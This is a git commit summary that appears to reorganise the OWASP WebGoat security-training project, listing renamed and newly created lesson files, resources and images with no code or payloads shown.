 rename {webgoat-lessons/idor/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/idor/IDORLogin.java (91%)
 rename {webgoat-lessons/idor/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/idor/IDORViewOtherProfile.java (91%)
 rename {webgoat-lessons/idor/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/idor/IDORViewOwnProfile.java (96%)
 rename {webgoat-lessons/idor/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/idor/IDORViewOwnProfileAltUrl.java (90%)
 rename {webgoat-lessons/idor/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/idor/UserProfile.java (98%)
 rename {webgoat-lessons/insecure-login/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/insecure_login/InsecureLogin.java (91%)
 rename {webgoat-lessons/insecure-login/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/insecure_login/InsecureLoginTask.java (90%)
 rename {webgoat-lessons/jwt/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/jwt/JWT.java (90%)
 rename {webgoat-lessons/jwt/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/jwt/JWTDecodeEndpoint.java (78%)
 rename {webgoat-lessons/jwt/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/jwt/JWTFinalEndpoint.java (93%)
 rename {webgoat-lessons/jwt/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/jwt/JWTQuiz.java (89%)
 rename {webgoat-lessons/jwt/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/jwt/JWTRefreshEndpoint.java (96%)
 rename {webgoat-lessons/jwt/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/jwt/JWTSecretKeyEndpoint.java (94%)
 rename {webgoat-lessons/jwt/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/jwt/JWTVotesEndpoint.java (96%)
 rename {webgoat-lessons/jwt/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/jwt/votes/Views.java (78%)
 rename {webgoat-lessons/jwt/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/jwt/votes/Vote.java (98%)
 rename {webgoat-lessons/webgoat-lesson-template/src/main/java/org/owasp/webgoat/template => src/main/java/org/owasp/webgoat/lessons/lesson_template}/LessonTemplate.java (89%)
 rename {webgoat-lessons/webgoat-lesson-template/src/main/java/org/owasp/webgoat/template => src/main/java/org/owasp/webgoat/lessons/lesson_template}/SampleAttack.java (92%)
 rename {webgoat-lessons/logging/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/logging/LogBleedingTask.java (93%)
 rename {webgoat-lessons/logging/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/logging/LogSpoofing.java (91%)
 rename {webgoat-lessons/logging/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/logging/LogSpoofingTask.java (92%)
 rename {webgoat-lessons/missing-function-ac/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/missing_ac/DisplayUser.java (98%)
 rename {webgoat-lessons/missing-function-ac/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/missing_ac/MissingAccessControlUserRepository.java (94%)
 rename {webgoat-lessons/missing-function-ac/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/missing_ac/MissingFunctionAC.java (91%)
 rename {webgoat-lessons/missing-function-ac/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/missing_ac/MissingFunctionACHiddenMenus.java (90%)
 rename {webgoat-lessons/missing-function-ac/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/missing_ac/MissingFunctionACUsers.java (93%)
 rename {webgoat-lessons/missing-function-ac/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/missing_ac/MissingFunctionACYourHash.java (86%)
 rename {webgoat-lessons/missing-function-ac/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/missing_ac/MissingFunctionACYourHashAdmin.java (88%)
 rename {webgoat-lessons/missing-function-ac/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/missing_ac/User.java (84%)
 rename {webgoat-lessons/password-reset/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/password_reset/PasswordReset.java (89%)
 rename {webgoat-lessons/password-reset/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/password_reset/PasswordResetEmail.java (96%)
 rename {webgoat-lessons/password-reset/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/password_reset/QuestionsAssignment.java (93%)
 rename {webgoat-lessons/password-reset/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/password_reset/ResetLinkAssignment.java (92%)
 rename {webgoat-lessons/password-reset/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/password_reset/ResetLinkAssignmentForgotPassword.java (96%)
 rename {webgoat-lessons/password-reset/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/password_reset/SecurityQuestionAssignment.java (96%)
 rename {webgoat-lessons/password-reset/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/password_reset/SimpleMailAssignment.java (96%)
 rename {webgoat-lessons/password-reset/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/password_reset/TriedQuestions.java (96%)
 rename {webgoat-lessons/password-reset/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/password_reset/resetlink/PasswordChangeForm.java (84%)
 rename {webgoat-lessons/path-traversal/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/path_traversal/PathTraversal.java (89%)
 rename {webgoat-lessons/path-traversal/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/path_traversal/ProfileUpload.java (86%)
 rename {webgoat-lessons/path-traversal/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/path_traversal/ProfileUploadBase.java (93%)
 rename {webgoat-lessons/path-traversal/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/path_traversal/ProfileUploadFix.java (87%)
 rename {webgoat-lessons/path-traversal/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/path_traversal/ProfileUploadRemoveUserInput.java (84%)
 rename {webgoat-lessons/path-traversal/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/path_traversal/ProfileUploadRetrieval.java (92%)
 rename {webgoat-lessons/path-traversal/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/path_traversal/ProfileZipSlip.java (93%)
 rename {webgoat-lessons/secure-passwords/src/main/java/org/owasp/webgoat/secure_password => src/main/java/org/owasp/webgoat/lessons/secure_passwords}/SecurePasswords.java (90%)
 rename {webgoat-lessons/secure-passwords/src/main/java/org/owasp/webgoat/secure_password => src/main/java/org/owasp/webgoat/lessons/secure_passwords}/SecurePasswordsAssignment.java (96%)
 rename {webgoat-lessons/spoof-cookie/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/spoofcookie/SpoofCookie.java (90%)
 rename {webgoat-lessons/spoof-cookie/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/spoofcookie/SpoofCookieAssignment.java (95%)
 rename {webgoat-lessons/spoof-cookie/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/spoofcookie/encoders/EncDec.java (98%)
 rename {webgoat-lessons/sql-injection/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/sql_injection/advanced/SqlInjectionAdvanced.java (89%)
 rename {webgoat-lessons/sql-injection/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/sql_injection/advanced/SqlInjectionChallenge.java (93%)
 rename {webgoat-lessons/sql-injection/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/sql_injection/advanced/SqlInjectionChallengeLogin.java (89%)
 rename {webgoat-lessons/sql-injection/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/sql_injection/advanced/SqlInjectionLesson6a.java (92%)
 rename {webgoat-lessons/sql-injection/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/sql_injection/advanced/SqlInjectionLesson6b.java (92%)
 rename {webgoat-lessons/sql-injection/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/sql_injection/advanced/SqlInjectionQuiz.java (94%)
 rename {webgoat-lessons/sql-injection/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/sql_injection/introduction/SqlInjection.java (89%)
 rename {webgoat-lessons/sql-injection/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/sql_injection/introduction/SqlInjectionLesson10.java (93%)
 rename {webgoat-lessons/sql-injection/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/sql_injection/introduction/SqlInjectionLesson2.java (90%)
 rename {webgoat-lessons/sql-injection/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/sql_injection/introduction/SqlInjectionLesson3.java (91%)
 rename {webgoat-lessons/sql-injection/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/sql_injection/introduction/SqlInjectionLesson4.java (91%)
 rename {webgoat-lessons/sql-injection/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/sql_injection/introduction/SqlInjectionLesson5.java (91%)
 rename {webgoat-lessons/sql-injection/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/sql_injection/introduction/SqlInjectionLesson5a.java (94%)
 rename {webgoat-lessons/sql-injection/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/sql_injection/introduction/SqlInjectionLesson5b.java (93%)
 rename {webgoat-lessons/sql-injection/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/sql_injection/introduction/SqlInjectionLesson8.java (94%)
 rename {webgoat-lessons/sql-injection/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/sql_injection/introduction/SqlInjectionLesson9.java (93%)
 rename {webgoat-lessons/sql-injection/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/sql_injection/mitigation/Servers.java (67%)
 rename {webgoat-lessons/sql-injection/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/sql_injection/mitigation/SqlInjectionLesson10a.java (90%)
 rename {webgoat-lessons/sql-injection/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/sql_injection/mitigation/SqlInjectionLesson10b.java (96%)
 rename {webgoat-lessons/sql-injection/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/sql_injection/mitigation/SqlInjectionLesson13.java (89%)
 rename {webgoat-lessons/sql-injection/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/sql_injection/mitigation/SqlInjectionMitigations.java (89%)
 rename {webgoat-lessons/sql-injection/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/sql_injection/mitigation/SqlOnlyInputValidation.java (86%)
 rename {webgoat-lessons/sql-injection/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/sql_injection/mitigation/SqlOnlyInputValidationOnKeywords.java (87%)
 rename {webgoat-lessons/ssrf/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/ssrf/SSRF.java (91%)
 rename {webgoat-lessons/ssrf/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/ssrf/SSRFTask1.java (92%)
 rename {webgoat-lessons/ssrf/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/ssrf/SSRFTask2.java (92%)
 rename {webgoat-lessons/vulnerable-components/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/vulnerable_components/Contact.java (95%)
 rename {webgoat-lessons/vulnerable-components/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/vulnerable_components/ContactImpl.java (95%)
 rename {webgoat-lessons/vulnerable-components/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/vulnerable_components/VulnerableComponents.java (89%)
 rename {webgoat-lessons/vulnerable-components/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/vulnerable_components/VulnerableComponentsLesson.java (74%)
 rename {webgoat-lessons/webgoat-introduction/src/main/java/org/owasp/webgoat/introduction => src/main/java/org/owasp/webgoat/lessons/webgoat_introduction}/WebGoatIntroduction.java (90%)
 rename {webgoat-lessons/webwolf-introduction/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/webwolf_introduction/Email.java (81%)
 rename {webgoat-lessons/webwolf-introduction/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/webwolf_introduction/LandingAssignment.java (89%)
 rename {webgoat-lessons/webwolf-introduction/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/webwolf_introduction/MailAssignment.java (94%)
 rename {webgoat-lessons/webwolf-introduction/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/webwolf_introduction/WebWolfIntroduction.java (89%)
 rename {webgoat-lessons/cross-site-scripting/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/xss/Comment.java (90%)
 rename {webgoat-lessons/cross-site-scripting/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/xss/CrossSiteScripting.java (90%)
 rename {webgoat-lessons/cross-site-scripting/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/xss/CrossSiteScriptingLesson1.java (91%)
 rename {webgoat-lessons/cross-site-scripting/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/xss/CrossSiteScriptingLesson3.java (93%)
 rename {webgoat-lessons/cross-site-scripting/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/xss/CrossSiteScriptingLesson4.java (91%)
 rename {webgoat-lessons/cross-site-scripting/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/xss/CrossSiteScriptingLesson5a.java (93%)
 rename {webgoat-lessons/cross-site-scripting/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/xss/CrossSiteScriptingLesson6a.java (87%)
 rename {webgoat-lessons/cross-site-scripting/src/main/java/org/owasp/webgoat/xss/mitigation => src/main/java/org/owasp/webgoat/lessons/xss}/CrossSiteScriptingMitigation.java (90%)
 rename {webgoat-lessons/cross-site-scripting/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/xss/CrossSiteScriptingQuiz.java (94%)
 rename {webgoat-lessons/cross-site-scripting/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/xss/DOMCrossSiteScripting.java (90%)
 rename {webgoat-lessons/cross-site-scripting/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/xss/DOMCrossSiteScriptingVerifier.java (88%)
 rename {webgoat-lessons/cross-site-scripting/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/xss/stored/CrossSiteScriptingStored.java (89%)
 rename {webgoat-lessons/cross-site-scripting/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/xss/stored/StoredCrossSiteScriptingVerifier.java (89%)
 rename {webgoat-lessons/cross-site-scripting/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/xss/stored/StoredXssComments.java (93%)
 rename {webgoat-lessons/xxe/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/xxe/BlindSendFileAssignment.java (58%)
 rename {webgoat-lessons/xxe/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/xxe/Comment.java (97%)
 rename webgoat-lessons/xxe/src/main/java/org/owasp/webgoat/xxe/Comments.java => src/main/java/org/owasp/webgoat/lessons/xxe/CommentsCache.java (70%)
 rename {webgoat-lessons/xxe/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/xxe/CommentsEndpoint.java (95%)
 rename {webgoat-lessons/xxe/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/xxe/ContentTypeAssignment.java (92%)
 rename {webgoat-lessons/xxe/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/xxe/Ping.java (96%)
 rename {webgoat-lessons/xxe/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/xxe/SimpleXXE.java (90%)
 rename {webgoat-lessons/xxe/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/xxe/User.java (97%)
 rename {webgoat-lessons/xxe/src/main/java/org/owasp/webgoat => src/main/java/org/owasp/webgoat/lessons}/xxe/XXE.java (90%)
 create mode 100644 src/main/java/org/owasp/webgoat/server/ParentConfig.java
 create mode 100644 src/main/java/org/owasp/webgoat/server/StartWebGoat.java
 create mode 100644 src/main/java/org/owasp/webgoat/server/StartupMessage.java
 rename {webwolf/src/main/java/org/owasp => src/main/java/org/owasp/webgoat}/webwolf/FileServer.java (82%)
 rename {webwolf/src/main/java/org/owasp => src/main/java/org/owasp/webgoat}/webwolf/MvcConfiguration.java (76%)
 rename {webwolf/src/main/java/org/owasp => src/main/java/org/owasp/webgoat}/webwolf/WebSecurityConfig.java (90%)
 rename webwolf/src/main/java/org/owasp/webwolf/user/UserForm.java => src/main/java/org/owasp/webgoat/webwolf/WebWolf.java (58%)
 rename {webwolf/src/main/java/org/owasp => src/main/java/org/owasp/webgoat}/webwolf/jwt/JWTController.java (78%)
 rename {webwolf/src/main/java/org/owasp => src/main/java/org/owasp/webgoat}/webwolf/jwt/JWTToken.java (95%)
 rename {webwolf/src/main/java/org/owasp => src/main/java/org/owasp/webgoat}/webwolf/mailbox/Email.java (98%)
 rename {webwolf/src/main/java/org/owasp => src/main/java/org/owasp/webgoat}/webwolf/mailbox/MailboxController.java (83%)
 rename {webwolf/src/main/java/org/owasp => src/main/java/org/owasp/webgoat}/webwolf/mailbox/MailboxRepository.java (96%)
 rename {webwolf/src/main/java/org/owasp => src/main/java/org/owasp/webgoat}/webwolf/requests/LandingPage.java (97%)
 rename {webwolf/src/main/java/org/owasp => src/main/java/org/owasp/webgoat}/webwolf/requests/Requests.java (89%)
 rename {webwolf/src/main/java/org/owasp => src/main/java/org/owasp/webgoat}/webwolf/requests/WebWolfTraceRepository.java (87%)
 rename {webwolf/src/main/java/org/owasp => src/main/java/org/owasp/webgoat}/webwolf/user/UserRepository.java (97%)
 rename {webwolf/src/main/java/org/owasp => src/main/java/org/owasp/webgoat}/webwolf/user/UserService.java (94%)
 rename {webwolf/src/main/java/org/owasp => src/main/java/org/owasp/webgoat}/webwolf/user/WebGoatUser.java (90%)
 rename {webgoat-container/src => src}/main/resources/application-webgoat.properties (82%)
 rename {webwolf/src => src}/main/resources/application-webwolf.properties (76%)
 create mode 100644 src/main/resources/banner.txt
 rename {webgoat-container/src => src}/main/resources/db/container/V1__init.sql (100%)
 rename {webgoat-container/src => src}/main/resources/db/container/V2__version.sql (100%)
 rename {webgoat-container/src => src}/main/resources/goatkeystore.pkcs12 (100%)
 rename {webgoat-container/src => src}/main/resources/i18n/messages.properties (100%)
 rename {webgoat-container/src => src}/main/resources/i18n/messages_de.properties (100%)
 rename {webgoat-container/src => src}/main/resources/i18n/messages_fr.properties (100%)
 rename {webgoat-container/src => src}/main/resources/i18n/messages_nl.properties (100%)
 rename {webgoat-container/src => src}/main/resources/i18n/messages_ru.properties (100%)
 rename {webgoat-lessons/auth-bypass/src/main/resources/lessonPlans/en => src/main/resources/lessons/auth_bypass/documentation}/2fa-bypass.adoc (100%)
 rename {webgoat-lessons/auth-bypass/src/main/resources/lessonPlans/en => src/main/resources/lessons/auth_bypass/documentation}/bypass-intro.adoc (100%)
 rename {webgoat-lessons/auth-bypass/src/main/resources/lessonPlans/en => src/main/resources/lessons/auth_bypass/documentation}/lesson-template-video.adoc (100%)
 rename {webgoat-lessons/auth-bypass/src/main/resources => src/main/resources/lessons/auth_bypass}/html/AuthBypass.html (90%)
 rename {webgoat-lessons/auth-bypass/src/main/resources => src/main/resources/lessons/auth_bypass}/i18n/WebGoatLabels.properties (100%)
 rename {webgoat-lessons/auth-bypass/src/main/resources => src/main/resources/lessons/auth_bypass}/images/firefox-proxy-config.png (100%)
 rename {webgoat-lessons/auth-bypass/src/main/resources => src/main/resources/lessons/auth_bypass}/images/paypal-2fa-bypass.png (100%)
 rename {webgoat-lessons/auth-bypass/src/main/resources => src/main/resources/lessons/auth_bypass}/js/bypass.js (100%)
 rename {webgoat-lessons/bypass-restrictions/src/main/resources => src/main/resources/lessons/bypass_restrictions}/css/bypass-restrictions.css (100%)
 rename {webgoat-lessons/bypass-restrictions/src/main/resources/lessonPlans/en => src/main/resources/lessons/bypass_restrictions/documentation}/BypassRestrictions_FieldRestrictions.adoc (100%)
 rename {webgoat-lessons/bypass-restrictions/src/main/resources/lessonPlans/en => src/main/resources/lessons/bypass_restrictions/documentation}/BypassRestrictions_FrontendValidation.adoc (100%)
 rename {webgoat-lessons/bypass-restrictions/src/main/resources/lessonPlans/en => src/main/resources/lessons/bypass_restrictions/documentation}/BypassRestrictions_Intro.adoc (100%)
 rename {webgoat-lessons/bypass-restrictions/src/main/resources => src/main/resources/lessons/bypass_restrictions}/html/BypassRestrictions.html (94%)
 rename {webgoat-lessons/bypass-restrictions/src/main/resources => src/main/resources/lessons/bypass_restrictions}/i18n/WebGoatLabels.properties (100%)
 rename {webgoat-lessons/challenge/src/main/resources => src/main/resources/lessons/challenges}/challenge7/git.zip (100%)
 rename {webgoat-lessons/challenge/src/main/resources => src/main/resources/lessons/challenges}/css/challenge6.css (100%)
 rename {webgoat-lessons/challenge/src/main/resources => src/main/resources/lessons/challenges}/css/challenge8.css (100%)
 rename {webgoat-lessons/challenge/src/main/resources => src/main/resources/lessons/challenges}/db/migration/V2018_09_26_1__users.sql (100%)
 rename {webgoat-lessons/challenge/src/main/resources/lessonPlans/en => src/main/resources/lessons/challenges/documentation}/Challenge_1.adoc (100%)
 rename {webgoat-lessons/challenge/src/main/resources/lessonPlans/en => src/main/resources/lessons/challenges/documentation}/Challenge_5.adoc (100%)
 rename {webgoat-lessons/challenge/src/main/resources/lessonPlans/en => src/main/resources/lessons/challenges/documentation}/Challenge_6.adoc (100%)
 rename {webgoat-lessons/challenge/src/main/resources/lessonPlans/en => src/main/resources/lessons/challenges/documentation}/Challenge_7.adoc (100%)
 rename {webgoat-lessons/challenge/src/main/resources/lessonPlans/en => src/main/resources/lessons/challenges/documentation}/Challenge_8.adoc (100%)
 rename {webgoat-lessons/challenge/src/main/resources/lessonPlans/en => src/main/resources/lessons/challenges/documentation}/Challenge_introduction.adoc (100%)
 create mode 100644 src/main/resources/lessons/challenges/html/Challenge.html
 rename {webgoat-lessons/challenge/src/main/resources => src/main/resources/lessons/challenges}/html/Challenge1.html (95%)
 rename {webgoat-lessons/challenge/src/main/resources => src/main/resources/lessons/challenges}/html/Challenge5.html (97%)
 rename {webgoat-lessons/challenge/src/main/resources => src/main/resources/lessons/challenges}/html/Challenge6.html (98%)
 rename {webgoat-lessons/challenge/src/main/resources => src/main/resources/lessons/challenges}/html/Challenge7.html (97%)
 rename {webgoat-lessons/challenge/src/main/resources => src/main/resources/lessons/challenges}/html/Challenge8.html (99%)
 rename {webgoat-lessons/challenge/src/main/resources => src/main/resources/lessons/challenges}/i18n/WebGoatLabels.properties (100%)
 rename {webgoat-lessons/challenge/src/main/resources => src/main/resources/lessons/challenges}/images/avatar1.png (100%)
 rename {webgoat-lessons/challenge/src/main/resources => src/main/resources/lessons/challenges}/images/boss.jpg (100%)
 rename {webgoat-lessons/challenge/src/main/resources => src/main/resources/lessons/challenges}/images/challenge1-small.png (100%)
 rename {webgoat-lessons/challenge/src/main/resources => src/main/resources/lessons/challenges}/images/challenge1.png (100%)
 rename {webgoat-lessons/challenge/src/main/resources => src/main/resources/lessons/challenges}/images/challenge2-small.png (100%)
 rename {webgoat-lessons/challenge/src/main/resources => src/main/resources/lessons/challenges}/images/challenge2.png (100%)
 rename {webgoat-lessons/challenge/src/main/resources => src/main/resources/lessons/challenges}/images/challenge3-small.png (100%)
 rename {webgoat-lessons/challenge/src/main/resources => src/main/resources/lessons/challenges}/images/challenge3.png (100%)
 rename {webgoat-lessons/challenge/src/main/resources => src/main/resources/lessons/challenges}/images/challenge4-small.png (100%)
 rename {webgoat-lessons/challenge/src/main/resources => src/main/resources/lessons/challenges}/images/challenge4.png (100%)
 rename {webgoat-lessons/challenge/src/main/resources => src/main/resources/lessons/challenges}/images/challenge5-small.png (100%)
 rename {webgoat-lessons/challenge/src/main/resources => src/main/resources/lessons/challenges}/images/challenge5.png (100%)
 rename {webgoat-lessons/challenge/src/main/resources => src/main/resources/lessons/challenges}/images/hi-five-cat.jpg (100%)
 rename {webgoat-lessons/challenge/src/main/resources => src/main/resources/lessons/challenges}/images/user1.png (100%)
 rename {webgoat-lessons/challenge/src/main/resources => src/main/resources/lessons/challenges}/images/user2.png (100%)
 rename {webgoat-lessons/challenge/src/main/resources => src/main/resources/lessons/challenges}/images/user3.png (100%)
 rename {webgoat-lessons/challenge/src/main/resources => src/main/resources/lessons/challenges}/images/webgoat2.png (100%)
 rename {webgoat-lessons/challenge/src/main/resources => src/main/resources/lessons/challenges}/js/bootstrap.min.js (100%)
 rename {webgoat-lessons/challenge/src/main/resources => src/main/resources/lessons/challenges}/js/challenge6.js (100%)
 rename {webgoat-lessons/challenge/src/main/resources => src/main/resources/lessons/challenges}/js/challenge8.js (100%)
 rename {webgoat-lessons/chrome-dev-tools/src/main/resources/lessonPlans/en => src/main/resources/lessons/chrome_dev_tools/documentation}/ChromeDevTools_Assignment.adoc (100%)
 rename {webgoat-lessons/chrome-dev-tools/src/main/resources/lessonPlans/en => src/main/resources/lessons/chrome_dev_tools/documentation}/ChromeDevTools_Assignment_Network.adoc (100%)
 rename {webgoat-lessons/chrome-dev-tools/src/main/resources/lessonPlans/en => src/main/resources/lessons/chrome_dev_tools/documentation}/ChromeDevTools_console.adoc (100%)
 rename {webgoat-lessons/chrome-dev-tools/src/main/resources/lessonPlans/en => src/main/resources/lessons/chrome_dev_tools/documentation}/ChromeDevTools_elements.adoc (100%)
 rename {webgoat-lessons/chrome-dev-tools/src/main/resources/lessonPlans/en => src/main/resources/lessons/chrome_dev_tools/documentation}/ChromeDevTools_intro.adoc (100%)
 rename {webgoat-lessons/chrome-dev-tools/src/main/resources/lessonPlans/en => src/main/resources/lessons/chrome_dev_tools/documentation}/ChromeDevTools_sources.adoc (100%)
 rename {webgoat-lessons/chrome-dev-tools/src/main/resources => src/main/resources/lessons/chrome_dev_tools}/html/ChromeDevTools.html (78%)
 rename {webgoat-lessons/chrome-dev-tools/src/main/resources => src/main/resources/lessons/chrome_dev_tools}/i18n/WebGoatLabels.properties (100%)
 rename {webgoat-lessons/chrome-dev-tools/src/main/resources => src/main/resources/lessons/chrome_dev_tools}/images/ChromeDev_Console_Clear.jpg (100%)
 rename {webgoat-lessons/chrome-dev-tools/src/main/resources => src/main/resources/lessons/chrome_dev_tools}/images/ChromeDev_Console_Ex.jpg (100%)
 rename {webgoat-lessons/chrome-dev-tools/src/main/resources => src/main/resources/lessons/chrome_dev_tools}/images/ChromeDev_Elements.jpg (100%)
 rename {webgoat-lessons/chrome-dev-tools/src/main/resources => src/main/resources/lessons/chrome_dev_tools}/images/ChromeDev_Elements_CSS.jpg (100%)
 rename {webgoat-lessons/chrome-dev-tools/src/main/resources => src/main/resources/lessons/chrome_dev_tools}/images/ChromeDev_Network.jpg (100%)
 rename {webgoat-lessons/chrome-dev-tools/src/main/resources => src/main/resources/lessons/chrome_dev_tools}/images/ChromeDev_Sources.jpg (100%)
 rename {webgoat-lessons/cia/src/main/resources/lessonPlans/en => src/main/resources/lessons/cia/documentation}/CIA_availability.adoc (100%)
 rename {webgoat-lessons/cia/src/main/resources/lessonPlans/en => src/main/resources/lessons/cia/documentation}/CIA_confidentiality.adoc (100%)
 rename {webgoat-lessons/cia/src/main/resources/lessonPlans/en => src/main/resources/lessons/cia/documentation}/CIA_integrity.adoc (100%)
 rename {webgoat-lessons/cia/src/main/resources/lessonPlans/en => src/main/resources/lessons/cia/documentation}/CIA_intro.adoc (100%)
 rename {webgoat-lessons/cia/src/main/resources/lessonPlans/en => src/main/resources/lessons/cia/documentation}/CIA_quiz.adoc (100%)
 rename {webgoat-lessons/cia/src/main/resources => src/main/resources/lessons/cia}/html/CIA.html (70%)
 rename {webgoat-lessons/cia/src/main/resources => src/main/resources/lessons/cia}/i18n/WebGoatLabels.properties (100%)
 rename {webgoat-lessons/cia/src/main/resources => src/main/resources/lessons/cia}/js/questions_cia.json (100%)
 rename {webgoat-lessons/client-side-filtering/src/main/resources => src/main/resources/lessons/client_side_filtering}/css/clientSideFiltering-stage1.css (100%)
 rename {webgoat-lessons/client-side-filtering/src/main/resources => src/main/resources/lessons/client_side_filtering}/css/clientSideFilteringFree.css (100%)
